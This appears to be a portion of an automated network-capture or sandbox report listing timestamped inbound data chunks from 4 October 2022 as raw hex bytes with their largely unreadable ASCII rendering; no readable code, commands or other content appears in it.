                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9719INData Raw: db b5 a7 68 f3 27 fe 94 27 90 24 43 3d 42 4c 0e a8 a1 10 e7 6b e9 4b 62 92 b0 8f d2 b6 b9 16 d7 fa 2d 0a 3d fe 88 93 84 63 28 a3 2d c8 ad d1 75 a8 9b c6 ca 44 60 43 8c a8 8c 5d 75 25 69 23 7e a4 78 f8 9a b2 b4 0c 94 f8 16 ae 21 b2 fc 68 a5 a2 3c b5 a2 ab b3 e1 80 31 1c 16 48 ff 84 e1 42 6a 73 9a eb 8f b0 11 a4 78 a4 60 64 b2 59 eb d0 77 06 35 1b 58 84 4e 3b f2 c3 84 4f 03 47 56 4a 4c bf 6d c2 ac 8d 16 59 04 9a 53 bf 75 88 6b bd f2 eb 9c 84 be 81 78 32 65 45 e1 48 f2 55 e7 c2 64 b8 59 fd b6 68 5e 5b 19 8c 13 45 55 27 6e cd c0 4d 26 1d d3 38 37 7f 90 b0 d8 ca 78 26 28 24 c8 d1 a1 24 7d a3 48 fa 0c 82 5f 5e ab 63 18 fa 40 4f cb 68 c6 5d bc 1a a5 52 c1 5b 77 ed 4a b4 fc 88 c6 85 23 32 bd 4d 39 2b 97 4b 84 2b 24 0e fc ec 97 c5 3c 81 3a 2e 09 b4 08 d7 11 5b 23
                                                                                                                                                                                                                                    Data Ascii: h''$C=BLkKb-=c(-uD`C]u%i#~x!h<1HBjsx`dYw5XN;OGVJLmYSukx2eEHUdYh^[EU'nM&87x&($$}H_^c@Oh]R[wJ#2M9+K+$<:.[#
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9735INData Raw: b8 2d 7b 2f 87 ae 84 64 7e 04 e4 79 a4 8b 12 73 61 90 e9 33 d3 c0 75 3b 85 da 09 4e d8 b0 23 64 2c 19 d2 0b 61 4a 6f b1 2f 46 0f 0f 6b 9b 4e 06 d5 81 7c 17 dd df f1 c9 91 4b 4b 73 64 31 a3 7a 32 63 bc cc 9b 37 e5 07 ae da e7 47 7f 14 ae 6c 6c 31 ce f7 84 5f 04 5e 6e 3f 34 92 06 87 cb f4 70 5f fb cb 6b 34 16 c2 65 a9 14 1a c4 d8 b7 62 fb e2 da e9 c8 48 3f a4 97 42 9a 43 7a 67 8e 40 96 fe c2 a7 41 37 c6 94 84 52 b0 e7 f2 d8 00 12 a3 8e 31 8c c8 ae f0 c4 d1 13 ef 93 9d fd 0e 91 4c 39 f7 7c 48 52 0a cc 38 a5 28 47 18 30 47 6d b7 5e 8b 23 2e 91 0d 8b f4 fe cb 68 e7 c8 6e db 55 bc 09 b6 3a 59 c7 07 9d 09 78 3b 63 54 f5 cc a8 0c a5 2c 01 c8 49 ac fb 5b 75 04 9e 84 17 cf aa fb c0 a5 0d 86 09 21 13 e6 61 50 44 8c 94 f9 5a 55 a8 9f 37 6d e8 21 cd 64 8c aa c0 71 59
                                                                                                                                                                                                                                    Data Ascii: -{/d~ysa3u;N#d,aJo/FkN|KKsd1z2c7Gll1_^n?4p_k4ebH?BCzg@A7R1L9|HR8(G0Gm^#.hnU:Yx;cT,I[u!aPDZU7m!dqY
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9751INData Raw: 7d 0e 74 4f d5 68 fd c0 4b 12 1d b5 94 47 f3 a2 b6 9b eb b4 ca fa 9d 0b 9f 46 cf a8 ba d8 a7 c2 24 03 81 ac 4c a0 2e 9e 0e 41 2a 9f 01 a5 1f 03 a7 bb ef 2e 04 b6 8a 5f 74 c7 eb f9 ee 24 cf c3 57 ea be 76 79 b6 80 4f aa 77 17 6a 93 a9 dc 24 e0 4a 6a d1 90 db ab 0c d2 d8 d0 04 cf 26 bb 53 9c e9 56 26 d8 cb 26 af ab db 17 6a 61 43 ac 03 b0 55 7b 0a 95 c6 3d 25 4b 18 48 1c 55 6b 0f d3 d7 cd 2e 9d 4e 0d 4f b5 30 a3 7b ce e5 ae 16 c7 31 6a fa a9 83 1b 63 d0 95 ce 86 16 af 36 2f 13 c8 66 7e 65 49 0a ac 02 cf 33 d7 29 d5 03 4b 03 21 05 d4 3f de 71 3b 35 29 26 14 28 cf 99 6f 98 58 55 8f fb 5b 74 c9 d3 ac 56 63 6e 63 16 da b2 8a e1 72 7a 18 1c f1 4a 8a 14 86 c5 c6 8e 27 c5 f5 1c c7 97 02 2d ee 01 cd c6 6f 9f d9 10 9e a7 38 52 ab 1f 61 47 70 4a bc 8d 2f cb 98 57 02
                                                                                                                                                                                                                                    Data Ascii: }tOhKGF$L.A*._t$WvyOwj$Jj&SV&&jaCU{=%KHUk.NO0{1jc6/f~eI3)K!?q;5)&(oXU[tVcncrzJ'-o8RaGpJ/W
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9767INData Raw: 29 37 f3 f4 aa 01 b8 7b ae df 6d 44 be 1c 9a f9 ef 1c 22 e7 b9 3c e8 21 aa 2f 90 c9 ee 67 0d 3b 6f 58 cd 34 15 db 1b ea 2d cb cf 02 14 cd 67 64 38 80 ff 31 b0 8d 33 07 61 ad 83 6e 27 5a ce 97 17 b0 80 6a 26 9e 2e 95 4b 55 11 5a 44 5c b4 45 0a 6d ca 93 21 0b d8 be f6 bf 6f dd 06 33 c8 7a a9 ba bf d4 5a ab e9 61 74 8e 02 9c ba 78 b0 15 43 b1 af 3d 48 a6 e3 82 61 c7 5d 34 12 0e b7 b1 e0 ba 6f f4 1c d7 c1 27 63 eb ec 24 6e 88 7a 25 ac 2c 53 a3 6f ea 17 ff 2c 73 78 24 7c 92 2f 53 de e6 18 cb 5b 2f 25 32 e8 a2 ff b0 b2 4d 21 05 d0 f4 e4 3f cc 50 f8 a1 14 c9 8c 14 82 1d f3 4a 46 ce 2d 69 08 ea d1 ef 56 e8 7b bb 95 2e 18 d3 b5 66 41 99 e6 37 30 ae 0d 81 61 91 f7 2b 63 88 16 9e 94 be 9f 85 94 15 f6 f5 3f 44 ef fb b1 dc 9e 70 10 f9 fd d7 2e 52 fb 14 63 66 7b ef 9a
                                                                                                                                                                                                                                    Data Ascii: )7{mD"<!/g;oX4-gd813an'Zj&.KUZD\Em!o3zZatxC=Ha]4o'c$nz%,So,sx$|/S[/%2M!?PJF-iV{.fA70a+c?Dp.Rcf{
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9783INData Raw: a0 7f bb 1d ca 6f 17 6d 10 6f 6e d6 e1 bf c3 a4 f9 9a 28 87 d7 bc 83 06 ec ae fc 77 b5 c7 df 71 30 b3 80 a6 5b 38 37 cc 9a fb ea 54 96 e7 05 fd 14 9f 69 c5 2b 5e ac d8 42 88 41 9b e2 d4 50 7f 96 bb 13 9b 8b 97 dc 9c a6 df 68 18 4f 15 3e be 9c a9 1e 0a 26 8e 36 8c 27 9d e9 e8 42 bd 89 56 10 50 9a 14 28 1e aa 80 fb d8 e6 b4 70 a9 0f 59 6e 6b 5b 4a 0b ab a0 bb 7c c1 8b af dc 3d 00 aa 8d 3d 71 65 6e 5d 1d bd 20 d4 7b 63 06 a2 f1 38 cb 2a 0d 6e 2c 9b a1 0c 32 77 5a 43 14 65 a6 dc 1c 35 42 59 94 47 02 3e c2 3a cd 71 ed 50 18 62 2a ee 68 78 7f d7 92 bb 7f e5 76 29 60 9a 8a d3 08 76 44 c9 71 34 ff d3 6f 47 f2 d5 7c 25 88 d9 6d 89 9b b7 b0 8b b6 ed e5 87 b9 ef c0 a1 46 f2 e5 cc c6 83 b4 3d 54 2c e6 4b 1b 41 9e a3 b0 bb 87 96 b6 61 c4 b7 0e 52 6d 35 fd fb c3 76 2d
                                                                                                                                                                                                                                    Data Ascii: omon(wq0[87Ti+^BAPhO>&6'BVP(pYnk[J|==qen] {c8*n,2wZCe5BYG>:qPb*hxv)`vDq4oG|%mF=T,KAaRm5v-
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9799INData Raw: 9d 54 a1 03 7b 15 4b dc 86 d0 2d bf e0 b3 a6 88 b2 33 07 48 8e 55 4a 58 bf 21 df 13 49 60 cd 63 1d 31 73 b9 f6 e7 6c 02 df 40 c6 09 4e 6e db 0d f2 ce 4a f9 d2 a1 e5 b3 6f f9 fc d9 8d bb 79 b3 64 c7 28 93 88 21 e3 58 ec e6 f1 53 1f ce 2d ea 27 7e 09 09 d6 01 6f 44 3e f4 13 0d 03 c1 d5 9d 14 f0 31 bc 31 2b 67 a8 da bb 7c 9a f4 78 16 af 1a e0 5d 1f c4 b6 90 68 2f 32 53 48 d4 08 2b 17 02 f0 12 bd 37 b6 36 a9 ca c0 cb 0e d2 ac eb 77 0a 96 6b aa d7 34 87 6c da ca 55 b7 d1 5d 4c 2c 1b 87 95 67 b7 84 df 25 06 49 59 e8 1e b1 09 15 c6 30 7b 88 37 01 7b a3 57 a4 c0 27 a6 d5 f1 e9 18 88 51 d9 e9 8d 8c 94 53 3d ed c2 34 03 08 5b 4b ba c1 bf 84 68 ed 8e be e8 76 27 1a 88 a1 59 82 6c 3b 16 c7 1f d3 7f ee 60 2b 71 b8 8f 3b eb 70 ce 53 3a 5f 4d 33 4e 22 5a 26 47 3a c4 ae
                                                                                                                                                                                                                                    Data Ascii: T{K-3HUJX!I`c1sl@NnJoyd(!XS-'~oD>11+g|x]h/2SH+76wk4lU]L,g%IY0{7{W'QS=4[Khv'Yl;`+q;pS:_M3N"Z&G:
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9815INData Raw: 6b 76 af c3 e2 e1 1c 59 f1 28 1b c8 99 60 13 da 8b b9 a0 0d 1f 40 b5 59 ef ac 3a dc 6c a7 c4 47 a5 8c 31 6f 7d 07 1f f4 09 ca 79 6d c9 fd 7e 43 7f 68 aa 18 ef 0c 60 0c fa db 73 75 48 fa 72 9a f2 1d 28 08 05 34 36 5b aa 91 b2 1f 95 51 4b d9 42 9c 6d aa bf a0 ff a0 90 72 6f 34 69 a5 cd ec 39 4e f8 d5 ec 00 54 b2 e8 90 e3 3e 3b a0 2f 70 8b 18 c4 12 ce 38 2e 68 8c 33 b5 2c 00 69 0a 01 8f 29 4e 46 0a 0f b2 5a 17 51 ac 1c 61 24 6f b4 31 14 00 e1 ef d2 ad 93 57 82 bb 56 94 bf bc 67 63 34 a9 c6 1f 45 b5 b6 9d d8 3d b5 10 6b a3 c6 be f2 29 9b 69 63 10 3b 17 a5 0e 43 97 0d 7f a7 76 e2 63 53 1e d3 63 d4 f0 bf 0a c6 16 13 5a d3 91 40 6f 80 fe 41 78 a8 fd a1 1f 77 0e 02 3b 4b 9b 34 5e 75 fb 8d 48 be b6 bd 38 6d b4 68 a0 bf 46 02 b1 e6 05 c6 5c 9d d1 67 0e d5 a1 de 26
                                                                                                                                                                                                                                    Data Ascii: kvY(`@Y:lG1o}ym~Ch`suHr(46[QKBmro4i9NT>;/p8.h3,i)NFZQa$o1WVgc4E=k)ic;CvcScZ@oAxw;K4^uH8mhF\g&
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9831INData Raw: 9e 40 29 21 bc 28 a4 7b 3d cb 42 82 7e 93 bf 14 0d e6 d1 5b 67 12 f9 a8 13 65 0f bf df c5 7a 15 61 70 9f ea 62 e6 ad 96 31 ab b9 5a 08 28 c8 c8 16 8a 03 16 36 ca aa 21 59 89 c2 dd d2 41 3b 2f 82 7a ad 91 f1 43 b3 7b a6 b6 90 10 73 5a a3 a2 e7 0d 9f 9e 2e 6d 36 cd 31 69 eb 52 c9 2f 73 1e dd 1f eb cb 3c 5d a0 ad 72 29 b8 dd 6d cb 70 ca 41 62 cd 13 08 cc 9e 82 0c bf 43 49 3f 92 66 a6 79 b9 df 3c 4d 28 96 59 1a d4 3d 73 94 03 f9 f2 e9 9e 9f 7f b5 b4 ab a8 6d 32 5d 0d 87 5e 95 ca 21 03 df 97 9c 7a c0 cf d7 23 ba 19 05 fe 87 70 18 d4 23 24 27 4e f4 11 7d 62 11 bb 92 27 92 b4 c2 76 d1 ab e8 b6 6e 75 b0 1e fa 6f da 06 ad a8 98 8c 98 83 12 28 f6 c8 d5 d0 b0 15 d7 d8 44 13 fa 65 01 d7 93 6c ab a6 cd 7c 49 ad ba b7 aa 2b 06 0f 0f 7c a4 1f 5c 5f 55 d1 06 eb a4 12 01
                                                                                                                                                                                                                                    Data Ascii: @)!({=B~[gezapb1Z(6!YA;/zC{sZ.m61iR/s<]r)mpAbCI?fy<M(Y=sm2]^!z#p#$'N}b'vnuo(Del|I+|\_U
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9847INData Raw: a0 99 56 d3 64 03 59 3f c2 f6 aa ea 58 a9 24 f0 a8 5b 13 5c 9a 1f 43 99 a8 d3 4f 61 78 77 d2 64 d7 96 0c 96 5a 25 80 2b 45 9a d2 67 b3 e2 c2 b2 01 40 92 12 8e c9 58 1f 7c 2b 2e 61 14 58 83 1f df ad 0e 1f 8d 54 bb f2 34 0c 4d 50 de 6f c3 40 5c 42 0e fe 9b 09 12 42 95 15 b5 40 27 73 99 1e 39 77 88 d7 ff 4e 85 da 52 f7 b9 54 24 f1 8f 9a 59 25 30 34 f7 2a 59 5a c5 72 16 af 87 c1 b6 2e 3c d0 20 bf 10 6f 8c 8d 38 e5 3d 64 cc 02 b6 d8 be 1e 4b e2 7f 88 f0 fd 8d 09 46 29 d6 3a 3c e3 5a 21 87 08 63 f4 af 82 93 a7 ba 1e 23 9c 67 d2 a2 2d 79 1d 52 9d 74 61 ff cc 41 e8 fd 58 c8 b3 24 a9 c7 16 77 e0 46 2e 43 3d 07 91 c7 bd ea 3d 25 b1 3a f9 f9 58 a4 f5 3e 71 7b e9 ce 07 3a 69 ac 4e a1 f2 b5 4b 3b d0 b6 26 6b 5e 5b 3c 90 76 25 23 a1 04 68 62 a9 fb a0 80 6a d6 53 4b 39
                                                                                                                                                                                                                                    Data Ascii: VdY?X$[\COaxwdZ%+Eg@X|+.aXT4MPo@\BB@'s9wNRT$Y%04*YZr.< o8=dKF):<Z!c#g-yRtaAX$wF.C==%:X>q{:iNK;&k^[<v%#hbjSK9
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9863INData Raw: 54 53 f2 a4 2b 04 18 6b 08 17 4a 29 ca 1e e1 af 9f 74 47 f6 af 9c 08 14 7d f3 95 03 3a aa dc 90 45 00 20 0b 06 6e 43 e1 37 83 4e 5e 58 f7 44 81 42 0f d3 fa d6 04 86 d9 5c da 73 66 00 78 2a f3 50 36 12 3c 84 61 ed da 16 5e 5f db 58 35 7c e8 3a 55 ea a8 c6 4b bc 3e 62 9c e8 79 26 71 15 66 2b bd 30 26 67 7e 9d 2d 9e 6e ef 22 03 5d 48 e6 d8 e5 d9 0c 8b 37 df 55 9b f9 9b 65 e7 02 d6 35 ac 00 4b e9 76 a0 dd b2 27 85 4b 6c f3 89 a3 0c ef 49 aa 50 45 9f 4e 08 d0 f1 b8 63 25 0e b7 6c d5 9a bf d0 e9 a0 f6 65 88 25 72 ab 56 1a f1 df c0 be b4 19 56 7e c0 31 0a 06 50 93 76 ff 6e 27 58 f5 87 05 79 eb 74 ff 5a 4e 54 94 57 ed 3b 75 2f 97 d7 f5 06 d3 23 80 0e 60 a6 ea 8b a4 19 e9 57 fc c0 ac 11 a6 08 9a 9f 39 c0 c5 4f 89 04 03 16 60 fa 9d 75 f1 11 cd 6a e7 19 9f d1 16 97
                                                                                                                                                                                                                                    Data Ascii: TS+kJ)tG}:E nC7N^XDB\sfx*P6<a^_X5|:UK>by&qf+0&g~-n"]H7Ue5Kv'KlIPENc%le%rVV~1Pvn'XytZNTW;u/#`W9O`uj
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9879INData Raw: 34 51 2c 6b ea e7 59 7c b4 4c 1d 11 8d 26 4b 8f 08 d9 a2 1a d4 33 4f bf 11 61 8f 2e 18 d6 41 be bc e4 64 c8 de 4a 88 ca b8 b8 5b d5 af 36 32 42 85 68 6c 03 fa 7e 09 d2 6c 1e ed 1e 52 bb 1d bf cb a1 5f ac 91 15 8b 89 8a 19 53 3d 98 54 9f 7b 7b 65 01 6d 11 56 d2 4c be 8f 01 c8 f8 93 99 ad 24 d5 f1 39 83 00 60 fd a1 c5 fa e3 61 73 c5 a6 c7 5a 0e e2 ed 69 27 13 dd eb 41 ff d0 27 fc d8 15 26 2c f9 59 1a 74 92 3e 86 70 1f 63 65 b4 cb 3d 2d 43 13 d4 c3 14 7e b6 fd c0 01 82 9b 93 ae 8d 8e 6f 5b 94 c4 a2 c8 59 40 6c 2b cd 2a 06 e8 d2 20 e8 53 8f 6d 44 83 84 d3 42 5e 49 11 c9 71 71 fb fd ff 6c ef d5 2b e2 c5 11 c3 4b 7f c9 d3 c9 9f a7 3f 71 91 6a 71 15 92 d6 00 00 ec a3 b7 47 6c 7c ae 87 84 ec 43 ec 74 e7 ed 5c 4e 7c 50 96 f6 ad ba 6c f9 84 c9 0a d6 63 7c 4a 58 3d
                                                                                                                                                                                                                                    Data Ascii: 4Q,kY|L&K3Oa.AdJ[62Bhl~lR_S=T{{emVL$9`asZi'A'&,Yt>pce=-C~o[Y@l+* SmDB^Iqql+K?qjqGl|Ct\N|Plc|JX=
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9895INData Raw: dc 7b 42 da 91 c1 31 a9 44 10 44 24 dc 3b 80 da a2 1b 79 fd 36 3f 8f e5 b7 5f 50 17 5a e2 63 19 aa c6 36 89 b3 40 0d 14 75 a1 4d ac 9f 92 e1 a9 95 d6 1b 46 cd 4f 5b 06 b6 bd 80 50 08 5c 45 43 aa 69 99 07 56 71 27 53 18 02 b3 31 54 a5 36 ea ff b2 13 2f 2b 53 fd 01 c6 d4 1e a9 03 30 7e a9 a8 6b e4 88 3f 7b 2f b5 dd 25 d1 77 bf 66 97 62 ba dd 82 5f 4d 73 34 89 0f 83 d5 87 98 16 55 71 d8 37 54 02 f9 3a 29 09 56 11 5c 9d 08 c4 df 4a 44 27 73 38 eb 41 62 1b 44 2e bf 39 83 d2 13 de 0d 17 3f bc 11 93 df 96 06 80 60 da e8 20 77 73 a2 64 f6 ea 52 bc f9 31 bb 7a 02 6c 57 b1 84 35 59 db 4f 10 94 df bf a0 4a 97 a9 e3 b5 5c be fc 2c 24 91 10 c6 0e 78 bb 5e 94 b9 94 bb af 02 8e 8b 7a d3 fa f2 6c 40 aa 2d 8b 3c ed a1 84 e8 e5 7c f5 28 30 24 ea ab d7 dc a7 fd c8 5d e1 43
                                                                                                                                                                                                                                    Data Ascii: {B1DD$;y6?_PZc6@uMFO[P\ECiVq'S1T6/+S0~k?{/%wfb_Ms4Uq7T:)V\JD's8AbD.9?` wsdR1zlW5YOJ\,$x^zl@-<|(0$]C
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9911INData Raw: 1f 74 45 0d 4d 5a dd 6d bf 6a 4f 32 06 c0 bb 08 9c dc df 15 f4 c5 b9 a0 be 84 50 9c f1 39 93 67 64 2f 8e 44 80 10 e1 2f 59 a3 f2 00 c3 08 f1 b7 c4 6c aa 9f 5b e8 31 46 5e 0a 2e f8 ef 56 52 a4 91 93 17 fc 87 6d fb 7b 88 fd f8 2b 8c fb b4 1a f9 cb a8 3b 07 5a 38 23 2c 2f 4a f3 54 fb 5b e5 43 5b f3 78 50 97 98 29 be ff 9c 66 93 0b 32 c7 56 28 a3 49 f4 25 76 4d df a2 b4 1c b9 42 42 78 a9 58 bd 78 28 d7 ec da f3 a6 a6 7b 46 21 ac 4e b9 f1 44 6d e1 de 6b 7d c7 e6 79 0f 1b aa 15 29 f9 52 98 ef 7d 62 72 5f 8e e0 ef c8 89 46 7f 4d 18 f4 f2 49 3c ec c9 2a 77 24 a6 8f b6 13 34 60 47 e6 6b d8 ef 17 94 70 3d 87 e9 15 b1 8c 73 f6 a5 91 80 cc 85 51 5a d2 cf 0f 2e 6e ed 2c bd 06 cf b9 59 38 5e c1 99 a8 6b d0 7f 8c 7a 72 a5 73 7a 5b f1 1f dd f4 92 ec 50 de 15 8e 0b 43 3d
                                                                                                                                                                                                                                    Data Ascii: tEMZmjO2P9gd/D/Yl[1F^.VRm{+;Z8#,/JT[C[xP)f2V(I%vMBBxXx({F!NDmk}y)R}br_FMI<*w$4`Gkp=sQZ.n,Y8^kzrsz[PC=
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9927INData Raw: 93 24 c6 77 eb 13 1a 46 8d 8f 78 24 8a 04 69 4e 93 c4 51 af c9 fc 8b 59 ec bb 13 44 f9 75 1a 29 8c 09 68 ff 87 59 61 11 e2 c2 46 45 65 67 7c 70 bd 4c d3 7b fb 7f a9 de b3 a2 be f0 f4 01 9d 09 6f cb fb 36 0f ab e3 bf a9 a9 52 1a 42 ad 3b bf 20 bd 01 fd 8d a0 ad 1e c7 19 b3 2c fb 31 1b f4 c0 42 6a eb 05 89 ef 13 3c c2 e0 3b 13 74 b2 6c ec 17 42 13 d5 5d 3e 9c ce c1 2e 45 dd 16 8d 84 cd 49 1c 2c 77 5d dc 65 56 1a c0 f7 91 92 e6 3c 15 05 40 e7 95 bf b5 c2 75 9f c8 04 07 5c 97 ed 0b 68 33 0c 88 b9 85 62 f8 38 b5 fd 1a 72 0a ac 70 7d d4 20 b3 4d da 0a 8d f8 7c be cd 81 bc ba a1 4b b2 5e 5e 62 78 13 3f 4a 47 f5 97 d9 48 09 a4 19 f1 a1 12 17 f5 c3 73 76 07 bf d7 e8 88 2d bc 54 c8 76 e2 9f 8b 9c 18 20 d3 d3 b1 29 6b 6f fb e5 fd 95 6c c8 6a 21 d3 c9 36 0a 62 2d 2d
                                                                                                                                                                                                                                    Data Ascii: $wFx$iNQYDu)hYaFEeg|pL{o6RB; ,1Bj<;tlB]>.EI,w]eV<@u\h3b8rp} M|K^^bx?JGHsv-Tv )kolj!6b--
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9943INData Raw: d9 51 be b9 94 2d 2f e0 f4 dd 32 01 7f 33 0c 23 a4 a2 b6 5b df ba 12 6c 9b 0d 51 e0 d7 23 c9 f9 9e a7 bc a3 d0 b5 79 27 d3 17 3c 88 e4 37 d1 fb b5 44 96 b4 b8 ae a7 67 a1 af 51 31 88 04 af 04 ae cb ad e0 47 35 d8 ed 6e f9 9a bc e9 81 a1 36 63 b1 5d 54 15 bb 2a 84 a4 38 f1 60 18 dc 8c 7f 87 d5 03 c3 09 86 0a 29 83 db 10 9e ce ec 6e 01 36 72 ca d7 6c 44 49 2b c0 b0 90 f9 bf f9 38 9a 83 8d 4c c7 ee 22 d6 df 2e 93 46 bc 1d 64 1d 38 3b 4c e7 69 80 05 59 ff cd 30 01 ce 54 37 28 24 39 e0 f0 cd e7 a7 cd 42 61 8e 2d bd 58 10 8b 82 86 c5 c3 77 ea 84 7a 02 ca 43 58 39 7b b6 ce 27 c3 ce 66 a3 73 65 b1 e6 d9 5d cf 77 e8 06 df 82 06 ae f0 3f 82 66 87 9a a4 9e 9f 58 eb a0 fe 5b 4e 59 22 07 72 61 6c 87 9e 3f e9 61 13 56 84 22 02 87 e0 b5 3b 1d 6e e6 a8 50 b5 1c 60 56 14
                                                                                                                                                                                                                                    Data Ascii: Q-/23#[lQ#y'<7DgQ1G5n6c]T*8`)n6rlDI+8L".Fd8;LiY0T7($9Ba-XwzCX9{'fse]w?fX[NY"ral?aV";nP`V
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9959INData Raw: f4 8c a6 ad 8f 6d e1 a5 5e 91 47 0c 0a 32 73 2a 69 84 33 76 67 e5 94 33 32 00 9b d5 5d 8e 36 bb 95 60 93 a1 6b 05 b7 5c 9b e2 7c c2 e0 83 4c 1d 9d fa 6b b8 06 ad 11 93 74 47 6a 43 62 ad 83 48 0a 58 7a b0 66 6e 91 a6 de 90 f4 01 a6 7d ef 47 3d 43 3f 16 75 de d0 af bc d9 51 3b da 32 b5 52 f6 0a 6a ce 47 3b a9 b5 8c d0 23 f1 52 38 95 a7 eb de ca d7 a1 32 b9 21 08 66 65 3d e8 68 09 fa c8 c7 8f b2 ad ea f4 29 41 fe da 68 42 4c 0c c1 bd 90 6e 9e 49 36 72 ee 7c d5 4d 1d bb ba 88 c8 5f 06 ab f9 61 f4 b2 da f5 bc c0 e6 24 72 7e 0a d8 b5 28 01 54 f1 c9 71 97 96 5c e3 0b f3 ba 05 63 e2 45 96 cf 4c 9b 81 83 29 7d 70 93 e1 d0 7d 1e 18 3b c6 0e 74 28 93 df cc 52 be 4e 64 dd 40 5f 24 d1 dc 3c e1 21 d2 da f2 0f 22 bf d8 19 d1 ae 75 06 67 68 91 ef ca f4 67 90 21 49 c3 01
                                                                                                                                                                                                                                    Data Ascii: m^G2s*i3vg32]6`k\|LktGjCbHXzfn}G=C?uQ;2RjG;#R82!fe=h)AhBLnI6r|M_a$r~(Tq\cEL)}p};t(RNd@_$<!"ughg!I
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9975INData Raw: bf 3f b3 79 0a 21 af 53 f7 e3 74 23 fd 78 f5 67 d1 c4 42 f0 fa 18 1c e4 c3 8d 4e 27 4c 45 6c 59 c0 cf 19 38 77 45 26 a8 38 72 8f e5 e8 65 19 38 4f 32 bb f7 28 33 92 d5 9a a8 a1 3b 0b 2e ce c8 ca c6 8c ba 3e 64 c8 15 6f 25 1d 46 6f f1 74 ac 91 65 1f 18 a7 cc a4 3c 2c c7 97 a0 59 7d cf 5f aa 48 0c a1 e0 b5 6a 86 69 a1 11 01 7f 29 92 55 55 20 06 1d fa 37 ae 12 a1 52 00 76 41 52 5c c5 c2 16 25 39 20 dc 2b 6f f0 2e b3 2f 55 15 ed 10 6b 9d 08 d9 4d 98 f8 87 53 4d 01 16 89 14 46 54 2e 91 a8 19 0f 78 35 0e ec 7c 1e 03 5b 76 9b dc 71 ac 7d 93 f4 88 9f b1 a3 65 b8 e3 a9 d4 ca 39 36 86 c7 bd ad 75 e5 9d 00 cf 10 b7 1f 4a b4 02 0c 19 11 64 a2 9a 0d 53 2a 1b 2e 31 54 5e bf cc 4d a1 63 26 4e f6 3e 3d d8 9f 48 58 fb 40 be f5 a8 09 60 b0 f1 e1 55 bd 34 5f c3 bb ff f6 cc
                                                                                                                                                                                                                                    Data Ascii: ?y!St#xgBN'LElY8wE&8re8O2(3;.>do%Fote<,Y}_Hji)UU 7RvAR\%9 +o./UkMSMFT.x5|[vq}e96uJdS*.1T^Mc&N>=HX@`U4_
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC9991INData Raw: ae 9a 57 72 2f 9d c8 32 69 8d e9 40 68 2b 0c bc 0c da b9 96 cd 4c 9e 26 26 35 eb 23 69 13 d7 76 58 f1 27 fe 27 40 c8 46 bf 21 5d a4 3a 82 17 4c 4f e5 62 e6 ae ab f8 a3 bb 9f 30 4c 7b 8f e4 85 c0 ce f4 8c 7a cc 52 3b 4e 34 21 34 6b 0e d8 ab 15 9b 25 ad 88 1b 6f b1 54 7c a7 16 89 1e df c1 64 9c 0c df 7f 34 db 7f b4 cf c8 e2 d5 9f da 4e d7 ea 9d 2b 9b 75 49 1a af 69 c9 bb c4 8a 51 16 2a 59 cf ab 8f 14 98 3a 97 99 51 0f d9 fd 1f 11 2a d9 85 2b 4b 5f fc 23 33 80 7f 18 02 47 0a 44 7e d8 dc 4b 17 35 9c 71 9b 57 27 56 61 9f 9f d2 70 75 f7 5d 89 18 16 0a a0 85 9b 1b b8 59 d5 8a b4 dc 9e 2f e4 fc 83 95 3c 04 f9 86 55 26 61 b7 91 d9 a6 3d 22 df cf d7 62 38 ce 4d 38 25 3c 7a d0 9e 5f fc ca 82 a5 94 e9 d4 6c 5f 5d ac 05 34 58 ec ce 1a 38 36 1c c4 15 7a 47 4f d9 84 57
                                                                                                                                                                                                                                    Data Ascii: Wr/2i@h+L&&5#ivX''@F!]:LOb0L{zR;N4!4k%oT|d4N+uIiQ*Y:Q*+K_#3GD~K5qW'Vapu]Y/<U&a="b8M8%<z_l_]4X86zGOW
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10007INData Raw: 0a a8 ce 60 b1 cf d2 47 c7 41 4c a3 e4 0c f8 df b2 7a 6f 96 36 8e 69 39 59 42 3e 92 ad d5 3d 19 72 6e 4f 73 21 17 3e 58 d4 7a 11 58 96 06 23 57 0a b3 46 87 92 62 84 e1 41 7b 1f a3 e4 84 01 75 cf 03 34 36 ea 25 c2 ee b7 70 b6 1a 8f 6a 89 82 dc 5b 6c 5c ca 3a 84 28 90 49 3f d8 5e 30 b1 88 1e 06 7c e2 75 d9 b0 55 30 2d 86 83 e0 c5 02 dd de 2c ca b5 83 bc 35 c6 9f fa a0 67 6a 93 0e 28 21 07 10 54 0a e2 2d 61 66 e3 71 92 9b 94 33 43 f6 5e 79 4d 30 fb c0 ac 08 bd d8 ed a5 67 41 68 63 0f 7a 41 6b 7a 5f e7 e9 b2 21 82 42 45 32 86 f0 55 19 76 65 97 7e d5 a8 e4 fe e2 93 45 a6 99 2e b4 e2 08 ac 10 69 2b 58 ef 76 51 f6 2a 39 45 c5 e3 d3 b8 77 3a ad a5 00 5c 82 b1 54 dd 22 9f 85 4d 20 f9 84 ed 00 5e 23 fe 53 a4 30 f1 8f ff aa ff 4e 0f a4 7e e1 a5 d4 82 fc e6 d8 34 bc
                                                                                                                                                                                                                                    Data Ascii: `GALzo6i9YB>=rnOs!>XzX#WFbA{u46%pj[l\:(I?^0|uU0-,5gj(!T-afq3C^yM0gAhczAkz_!BE2Uve~E.i+XvQ*9Ew:\T"M ^#S0N~4
